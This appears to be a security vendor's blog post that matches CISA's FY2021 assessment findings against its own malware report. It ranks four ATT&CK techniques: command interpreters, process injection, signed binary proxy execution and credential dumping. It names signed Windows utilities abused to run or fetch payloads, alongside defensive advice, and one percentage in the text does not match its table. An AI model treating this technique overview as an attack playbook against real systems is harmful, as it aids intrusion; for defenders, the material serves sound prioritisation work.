.svg)
.svg)
In 2021, The U.S. Cybersecurity and Infrastructure Security Agency (CISA) performed 112 Risk and Vulnerability Assessments (RVA) of multiple stakeholders across multiple industries to identify vulnerabilities that adversaries could be exploited by adversaries [1]. The CISA’s RVA teams map the findings of each RVA to the MITRE ATT&CK® framework. Leveraging this data, CISA determined the top 3 most successfully utilized ATT&CK techniques in each tactic [2]. Therefore, these ATT&CK techniques can also be used by adversaries successfully.
Utilizing a different methodology, Picus Labs annually publishes the 10 most prevalent ATT&CK techniques used by adversaries in malware. Following the release of CISA's FY21 RVA analysis, Picus Labs identified the four shared MITRE ATT&CK techniques in FY2021 RVA results and The Top 10 Most Prevalent MITRE ATT&CK techniques in the Picus Red Report 2021.
Organizations of all sizes should prioritize these four ATT&CK techniques to enhance their cybersecurity posture since they were the most successfully utilized techniques in organizations by CISA's RVA teams, and they were the most used techniques by adversaries in their malware.
In this blog post, we explained the four shared ATT&CK techniques listed in the CISA RVA and the Picus Red Report and showed which adversary techniques security teams should focus on their efforts in their defensive security operations.
Download the Red Report - Top Ten MITRE ATT&CK Techniques
CISA’s Risk and Vulnerability Assessments (RVA) Report
The Risk and Vulnerability Assessment (RVA) Report is an annual report that is published by CISA. The data presented in the CISA RVA Report is collected from various critical government and infrastructure organizations. CISA RVA teams organize and run tests and evaluations such as penetration testing, social engineering, configuration reviews, and detection analysis. The results of these tests and evaluations are combined and mapped to National Vulnerability Database (NIST NVD) and MITRE ATT&CK so that organizations can take action to remediate their cyber defenses.
CISA RVA Report for Fiscal Year of 2021 (FY2021) was published in May 2022. The report gathers all the vulnerabilities discovered in RVA all year and maps them to the MITRE ATT&CK framework. The report shows the most common vulnerabilities found for each stage of the attack path.
Picus Red Report
Picus Red Report is an annual report based on the research conducted by Picus Labs. In 2021, Picus Labs analyzed more than 200,000 malware samples used by threat actors and determined the 10 most prevalent ATT&CK techniques. 89% of the techniques and sub-techniques listed in the Picus Red Report are also reported as the most successful techniques in the CISA RVA Report.
The Top 4 MITRE ATT&CK Techniques Identified from the CISA’s RVA Analysis and Picus Red Report
Security teams should prioritize and focus on the ATT&CK techniques they are both vulnerable to and most used by attackers. Since the following four techniques are the most successfully utilized techniques by RVA teams (CISA FY2021 RVA analysis) and the most prevalent techniques used by adversaries (Picus Red Report), they are more likely to be successfully employed by attackers in a cyberattack campaign.
1. MITRE ATT&CK T1059 Command and Scripting Interpreter
T1059 Command and Scripting Interpreter is an Execution technique that cyber threat actors use to run commands, scripts, and binaries on the victim system. This technique was the most prevalent adversary technique in the Picus Red Report 2021 and the most common vulnerability under the TA002 Execution tactic of the CISA RVA FY2021 Report.
26% of malware reported in the Picus Red Report uses T1059 Command and Scripting Interpreter technique. On the exploitability side, CISA’s RVA teams successfully employed the T1059 Command and Scripting Interpreter technique for Execution in 15.1% of assessed organizations.
|
Technique Name |
Execution |
|
T1059.001 PowerShell |
12.7% |
|
T1059.002 AppleScript |
0.3% |
|
T1059.003 Windows Command Shell |
2.1% |
For more detailed information, you can check our blog post on the T1059 Command and Scripting Interpreter technique.
2. MITRE ATT&CK T1055 Process Injection
T1055 Process Injection is both categorized under Privilege Escalation and Defense Evasion tactics in the MITRE ATT&CK Framework. Cyber threat actors use the T1055 Process Injection technique to stay hidden and elevate their privileges in the victim system.
21% of malware reported in the Picus Red Report uses the T1055 Process Injection technique. On the exploitability side, CISA’s RVA teams successfully employed the T1055 Process Injection technique for Privilege Escalation in 19.7% of assessed organizations; for Defense Evasion in 12.5% of assessed organizations.
|
Technique Name |
Privilege Escalation |
Defense Evasion |
|
T1055 Process Injection |
19.7% |
10.4% |
|
T1055.012 Process Hollowing |
- |
2.1% |
Please check our blog post for more detailed information on this technique.
3. MITRE ATT&CK T1218 Signed Binary Proxy Execution
T1218 Signed Binary Proxy Execution is a defense evasion technique in the MITRE ATT&CK framework that lets adversaries bypass process and signature based controls on Windows systems. Signed binaries are executables that carry trusted digital certificates. Because operating systems and many security tools trust these binaries by default, they are often allowed to run with fewer restrictions. Adversaries take advantage of this trust by launching malicious payloads through known, signed Windows utilities so their activity blends in with normal administration.
Common examples include regsvr32.exe and rundll32.exe to load and run malicious code, mshta.exe to execute HTA or script content fetched from remote locations, installutil.exe and odbcconf.exe to proxy execution of attacker supplied assemblies, and certutil.exe to download, decode, or stage payloads. These tools are present on most endpoints and frequently used for legitimate tasks, which makes blanket blocking risky and signature only detections unreliable. Attackers chain this technique with initial access, privilege escalation, and lateral movement to persist quietly and evade endpoint controls.
Defenders can reduce risk by focusing on behavior and context rather than file trust alone. Enable command line auditing and process creation logs, collect Sysmon events, and alert on suspicious parent child relationships, unusual command line flags, remote script execution, and signed binaries spawning network connections or writing to user writable directories. Apply application control to restrict high risk signed binaries, enforce PowerShell Constrained Language Mode, and enable Attack Surface Reduction rules that block or warn on abuse of built in tools. Segment high value systems, require multifactor authentication for administrative access, and continuously validate detections with real world simulations of T1218 sub techniques so you can confirm coverage and close gaps before an intrusion progresses.
16% of malware reported in the Picus Red Report uses the T1218 Signed Binary Proxy Execution technique. On the exploitability side, CISA’s RVA teams successfully employed the T1218 Signed Binary Proxy Execution technique for Defense Evasion in 22.7% of assessed organizations; for Execution in 22% of assessed organizations.
|
Technique Name |
Defense Evasion |
Execution |
|
T1218.001 Compiled HTML File |
1.4% |
1.4% |
|
T1218.002 Control Panel |
0.7% |
0.7% |
|
T1218.003 CMSTP |
0.3% |
0.3% |
|
T1218.004 InstallUtil |
0.3% |
0.3% |
|
T1218.005 Mshta |
12.7% |
13.4% |
|
T1218.010 Regsvr32 |
1.4% |
1.4% |
|
T1218.011 Rundll32 |
5.2% |
5.2% |
In version 11 of the MITRE ATT&CK Framework, the name of the technique is changed to T1218 System Binary Proxy Execution. For more detailed information, you can check our blog post on the T1218 Signed Binary Proxy Execution technique.
4. MITRE ATT&CK T1003 OS Credential Dumping
T1003 OS Credential Dumping is a Credential Access technique that adversaries use to obtain login credentials such as account name and password of the victim system.
14% of malware reported in the Picus Red Report uses the T1003 OS Credential Dumping technique. On the exploitability side, CISA’s RVA teams successfully employed the T1003 OS Credential Dumping technique for Credential Access in 13.1% of assessed organizations.
For more detailed information, please check our blog post on OS Credential Dumping.
Conclusion
Although they are independent, the CISA RVA Report and the Picus Red Report approach the global cyber threat landscape from different perspectives. While CISA RVA reports on exploitable vulnerabilities in organizations’ networks, the Red Report focuses on commonly used techniques by adversaries.
According to this study, the top 4 MITRE ATT&CK techniques that are most successfully utilized by red teamers and most used by adversaries are:
1. T1059 Command and Scripting Interpreter
2. T1055 Process Injection
3. T1218 Signed Binary Proxy Execution
4. T1003 OS Credential Dumping
Unsurprisingly, both reports draw very similar conclusions. If a vulnerability is more common among the target networks, adversaries gain the most benefit from their activities. Therefore, we can say that the CISA RVA Report and the Picus Red Report are the two faces of the same coin.
References
[1] https://www.cisa.gov/sites/default/files/publications/FY21-RVA-Analysis_508c.pdf
[2] https://www.cisa.gov/sites/default/files/publications/RVA%20INFOGRAPHIC_508c.pdf
.png?width=353&height=200&name=Ivanti-EPMM-ET-preview-sept25%20(1).png)